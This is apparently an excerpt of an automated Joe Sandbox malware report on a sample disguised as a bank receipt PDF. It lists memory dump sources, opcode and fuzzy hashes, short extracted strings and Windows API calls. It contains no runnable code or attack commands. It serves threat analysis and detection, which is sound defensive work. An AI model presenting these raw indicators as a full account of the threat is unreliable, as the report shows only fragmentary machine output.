                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 37fc9645abf033fcb28287a55102de7a4f91a5facfe3a00cc53e661a36470474
                                                                                                                                                          • Instruction ID: 71f2b829a8a5952765a79acba5673b3dc138a51b02691d43ca6d7baafb782728
                                                                                                                                                          • Opcode Fuzzy Hash: 37fc9645abf033fcb28287a55102de7a4f91a5facfe3a00cc53e661a36470474
                                                                                                                                                          • Instruction Fuzzy Hash: 32519574E01208DFDB18DFAAD994A9EBBB6BF88300F249129E815BB364DB355845CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 666e18a411c1c2050c0d6de65c7f51c53b32f426e350ccfd121322fe311445a0
                                                                                                                                                          • Instruction ID: 4987c3659196092a87d416070b07d2d105016f8607974a610e86bd09eb346f8e
                                                                                                                                                          • Opcode Fuzzy Hash: 666e18a411c1c2050c0d6de65c7f51c53b32f426e350ccfd121322fe311445a0
                                                                                                                                                          • Instruction Fuzzy Hash: F341F571E01248CFDB58DFAAD8446EEFBF2AF89300F14D52AD418AB258EB345946CF50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
                                                                                                                                                          • API String ID: 0-2636989756
                                                                                                                                                          • Opcode ID: 5283ef53b3c01715d2aa445d4ac277eed1845432d3b947855997bc20866dfe20
                                                                                                                                                          • Instruction ID: 6e49e22bb4af02cc401a1d280d9a0ab8f158254b06e6798529edf788f3847613
                                                                                                                                                          • Opcode Fuzzy Hash: 5283ef53b3c01715d2aa445d4ac277eed1845432d3b947855997bc20866dfe20
                                                                                                                                                          • Instruction Fuzzy Hash: 09123A30A042498FCB24CF68D984ADEBBF2FF88314F259559E885AB6A1D730ED41CF50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $kq$$kq
                                                                                                                                                          • API String ID: 0-3550614674
                                                                                                                                                          • Opcode ID: 857ddcc27dbf4664f5160f9f9dd9d3ec6c23b138e052978e8b00cfd69c488571
                                                                                                                                                          • Instruction ID: 8e36b9e9c75a2dbc1be0b4260da8939f875015c8e9c99f6da7c0cd21ec7be5b3
                                                                                                                                                          • Opcode Fuzzy Hash: 857ddcc27dbf4664f5160f9f9dd9d3ec6c23b138e052978e8b00cfd69c488571
                                                                                                                                                          • Instruction Fuzzy Hash: D552FE74A00218CFEB24ABA4C950BEEBB76FB94300F1091A9D10A77365DF359E85DF51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hoq$Hoq
                                                                                                                                                          • API String ID: 0-3106737575
                                                                                                                                                          • Opcode ID: 2a237a41a19e464cfcf709e6d937e7824361a7babf099eeca3393b46ae7adafe
                                                                                                                                                          • Instruction ID: dcbaef6becbc4583d84616248757904cf2247473c5650dd4b1a1f65b837de7e4
                                                                                                                                                          • Opcode Fuzzy Hash: 2a237a41a19e464cfcf709e6d937e7824361a7babf099eeca3393b46ae7adafe
                                                                                                                                                          • Instruction Fuzzy Hash: 99B1BB307042108FDB25AF39D854BBB7BE6AF88314F189569E946EB3A5DB39CC41C790
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,oq$,oq
                                                                                                                                                          • API String ID: 0-3825397795
                                                                                                                                                          • Opcode ID: 1b4f5e02ca53251b0196cdc885e01e057232d8ca017c5a0c020e7e7dd9d69ccf
                                                                                                                                                          • Instruction ID: c7306cbd9fd06503eaffd6bd7c1a85817a06db38c03aacaf7c3feb099a49ce91
                                                                                                                                                          • Opcode Fuzzy Hash: 1b4f5e02ca53251b0196cdc885e01e057232d8ca017c5a0c020e7e7dd9d69ccf
                                                                                                                                                          • Instruction Fuzzy Hash: A5818D34A01505DFCB24CF69C8849EBBBB2BF89314B24A569D405F7369DB39EC41CBA0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'kq$4'kq
                                                                                                                                                          • API String ID: 0-4171853269
                                                                                                                                                          • Opcode ID: 92b83cda7961ab89d56bf1c331f804b3d473dc0ac0a1514c1e02401bbbde6618
                                                                                                                                                          • Instruction ID: 98756b3c94c65fd3078009e133ea05ac3d9cd56a4a93f93265d0777315ca5cd6
                                                                                                                                                          • Opcode Fuzzy Hash: 92b83cda7961ab89d56bf1c331f804b3d473dc0ac0a1514c1e02401bbbde6618
                                                                                                                                                          • Instruction Fuzzy Hash: 4351A0307042459FDB10DF69C944BABBBE6EF89314F148466EA08DB266DB75CD02CBA1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRkq
                                                                                                                                                          • API String ID: 0-1052062081
                                                                                                                                                          • Opcode ID: 674ab1633a3343aa3a66a536163bf79df4c743b01f633d2ea54c3fac88209bbb
                                                                                                                                                          • Instruction ID: 17d2f649c63ca35ad75faab98d069839286bd84d717684dac25906aa988b99db
                                                                                                                                                          • Opcode Fuzzy Hash: 674ab1633a3343aa3a66a536163bf79df4c743b01f633d2ea54c3fac88209bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 6452BD74A00219CFCB64EF64ED94B9DBBB2FB48315F1085A5D409A7368DB346E86CF90
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,055C735E,?,?,?,?,?), ref: 055C741F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: b63d6a348579373675eb73e78976f9001ee48f3f8e2f960f0de40b9effb4433c
                                                                                                                                                          • Instruction ID: 7f6d7300d67106ddfe803dc84ae92a5a4bd68d2949a3d0e84b5d7412580ba59e
                                                                                                                                                          • Opcode Fuzzy Hash: b63d6a348579373675eb73e78976f9001ee48f3f8e2f960f0de40b9effb4433c
                                                                                                                                                          • Instruction Fuzzy Hash: 5321D2B59002189FDB10CFAAD584AEEBFF4FB48320F14845AE918A7310D374A950CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,055C735E,?,?,?,?,?), ref: 055C741F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          APIs
                                                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,055C9058,03A742A8,02B7EC3C), ref: 055C90E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2941952884-0
                                                                                                                                                          APIs
                                                                                                                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,055C9058,03A742A8,02B7EC3C), ref: 055C90E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnumThreadWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2941952884-0
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 055C9485
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2030045667-0
                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 055C9485
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2030045667-0
                                                                                                                                                          APIs
                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 055C821D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          APIs
                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 055C821D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq
                                                                                                                                                          • API String ID: 0-2789353238
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07c2d4c4b298beb1fcb8a0507f7de1990a35812043074908c7032d524ca81ab2
                                                                                                                                                          • Instruction ID: f812bc3f6215697b9d0015ef93c9eb6de9f59ddcd2cb3b970cfcb038490c282b
                                                                                                                                                          • Opcode Fuzzy Hash: 07c2d4c4b298beb1fcb8a0507f7de1990a35812043074908c7032d524ca81ab2
                                                                                                                                                          • Instruction Fuzzy Hash: 9E519474E01208CFCB48DFA9D98499DBBF2FF89310B209569E805BB365DB35A946CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a8f866fff6ef8261eaa00a795717f2fb02b4c6446e7924265fd59db563b7921e
                                                                                                                                                          • Instruction ID: 06737fb536f7fdd145596e277edbcda0c50b104bed095f9956ebf946d28cf3fe
                                                                                                                                                          • Opcode Fuzzy Hash: a8f866fff6ef8261eaa00a795717f2fb02b4c6446e7924265fd59db563b7921e
                                                                                                                                                          • Instruction Fuzzy Hash: E0519D31A04249DFCF11CFA8C848AEEBBF2EF45314F188566E855AB261D375D914CB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ad9c38378dbd8dc8ddd2c4ab8db4d24c3fb457b5bee0d46cc1d5ee7942812885
                                                                                                                                                          • Instruction ID: 9d4a121cb75031f90dde66741106b9e69d8bdb540de0fb1b851a0f1c4e1d5263
                                                                                                                                                          • Opcode Fuzzy Hash: ad9c38378dbd8dc8ddd2c4ab8db4d24c3fb457b5bee0d46cc1d5ee7942812885
                                                                                                                                                          • Instruction Fuzzy Hash: 65319F32700509EFCB15AF64D844AEF3BB2FB48300F109015F955A7258CB76CE61DBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d8102d2c45d3f3dc8c4e9867ae0e78160fe14831ed33635485d28f7015e004f
                                                                                                                                                          • Instruction ID: 62a02aad31feea2ed8bd57546a7a05e144d5060020f82b3fa2e47bb660478b0f
                                                                                                                                                          • Opcode Fuzzy Hash: 5d8102d2c45d3f3dc8c4e9867ae0e78160fe14831ed33635485d28f7015e004f
                                                                                                                                                          • Instruction Fuzzy Hash: 9B2106303002138BCB251B758654ABF36AFAFD435C714503AD562EB3A8DE39CC42D381
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: aeb8abf0cd949ed2a82c7e9bcb48211628fee68ad98554952a118f6c69ec7738
                                                                                                                                                          • Instruction ID: df482cf2a8b2b8952770e48affb2d43956b6abfbf0a56dfaf653b30e292604d2
                                                                                                                                                          • Opcode Fuzzy Hash: aeb8abf0cd949ed2a82c7e9bcb48211628fee68ad98554952a118f6c69ec7738
                                                                                                                                                          • Instruction Fuzzy Hash: 2621C5303001138BDB245A658654BBF229FAFD475DF24A039D562EB7A8DE7ACC42D381
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4ab4068235cc88678d2851ff36769385f9e33cbbab8f0b71e59aa60169a8f369
                                                                                                                                                          • Instruction ID: c5543e66d4aba7a02f4d36f8d382eb8e2c58a70cd312e432c9de7672c23e49d4
                                                                                                                                                          • Opcode Fuzzy Hash: 4ab4068235cc88678d2851ff36769385f9e33cbbab8f0b71e59aa60169a8f369
                                                                                                                                                          • Instruction Fuzzy Hash: 1621F231B046118FC725AA35C45896FB7E2EFC57557188069E856EB3A8CF39DC028B80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eaa6d1b13fcb36f025dcc757fffedd9cff0471f050fa0074f0b0e1da8a985430
                                                                                                                                                          • Instruction ID: d7dc96b61de05abee91bff0308ffb3a1070d4c6304bc23d5949f6574a66d768e
                                                                                                                                                          • Opcode Fuzzy Hash: eaa6d1b13fcb36f025dcc757fffedd9cff0471f050fa0074f0b0e1da8a985430
                                                                                                                                                          • Instruction Fuzzy Hash: E0217F35A00105AFCB15DA24C540AEF77A5EFD9360F10855DD91A9B258DB30EE42CBD0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4148976431.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_e1d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 176996e1983fec2e311f40f48a3222465bf804756ff1978b91823e60943c33f1
                                                                                                                                                          • Instruction ID: 5dc2a9a8a546d6bc4059dc197b6ce2eb59b991da0d5446c1cd717001ef81e89c
                                                                                                                                                          • Opcode Fuzzy Hash: 176996e1983fec2e311f40f48a3222465bf804756ff1978b91823e60943c33f1
                                                                                                                                                          • Instruction Fuzzy Hash: 26212271508240EFCB05DF14DDC0BABBF66FB98318F20C569E8095B256C336D896CAA2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149096181.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_e2d000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6b5f76a13f1ce368e64c662a67636c4095d65ac5c9246cdaaa79bf6c0bf38b9e
                                                                                                                                                          • Instruction ID: 778bd8f1d6d11d200ce2ddade6ee4b94bfca301a70920750c826ea8ee5ce8257
                                                                                                                                                          • Opcode Fuzzy Hash: 6b5f76a13f1ce368e64c662a67636c4095d65ac5c9246cdaaa79bf6c0bf38b9e
                                                                                                                                                          • Instruction Fuzzy Hash: 35214671608340DFDB04DF14EDC0B26BBA5FB84318F20C56DEA095B796C336D866CA62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 08f15291e2ac0fbb8269af3e18430bf815c829af6520f4dc07aabc45498be8fc
                                                                                                                                                          • Instruction ID: 6989b685bdae5faf88b801778add61754f3bcb98e9a41ca273c322eac96638f0
                                                                                                                                                          • Opcode Fuzzy Hash: 08f15291e2ac0fbb8269af3e18430bf815c829af6520f4dc07aabc45498be8fc
                                                                                                                                                          • Instruction Fuzzy Hash: 0A210432A05608DFCB15AF24D8447EF3BF1EF49314F20502AF855AB258DB798E51CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3da11d42784ab33480490721ad96d9b84f848a3b2e797fe2b5d019b75c7642e9
                                                                                                                                                          • Instruction ID: 6f33d9494c42e8ed782474921ff239236a758782dcedd6397fec3978fbdbf2e1
                                                                                                                                                          • Opcode Fuzzy Hash: 3da11d42784ab33480490721ad96d9b84f848a3b2e797fe2b5d019b75c7642e9
                                                                                                                                                          • Instruction Fuzzy Hash: 2A319278E11208CFCB54DFA8E5849ADBBF6FF49304B205469E809AB369D735AD45CF40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7dabb78591da1199ec3444d4fe57afb09c4fde25a6731d0a0595b68af9c30059
                                                                                                                                                          • Instruction ID: 2ce2913019448652f2425a6fbbb2c4b8dbb9f9662bc03d065fa80c8a1eb6e11d
                                                                                                                                                          • Opcode Fuzzy Hash: 7dabb78591da1199ec3444d4fe57afb09c4fde25a6731d0a0595b68af9c30059
                                                                                                                                                          • Instruction Fuzzy Hash: A7219C30E002499FCB14CFA5D690AEEBFB6EF49305F248069E555F62A5DB35D941CB20
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 267f93c275c50929c2b15a19064ad387a7b52ff45e30cba2d72bbe8b016b03ba
                                                                                                                                                          • Instruction ID: 843a34cb6e55e6e68a8bf04eeeb947fc54259ec05e589b1a4885ba1f34e061af
                                                                                                                                                          • Opcode Fuzzy Hash: 267f93c275c50929c2b15a19064ad387a7b52ff45e30cba2d72bbe8b016b03ba
                                                                                                                                                          • Instruction Fuzzy Hash: 9F11A1357046119FC7256A2AD45897FB7E6FFC57A53184078E906EB364CF39DC028B90
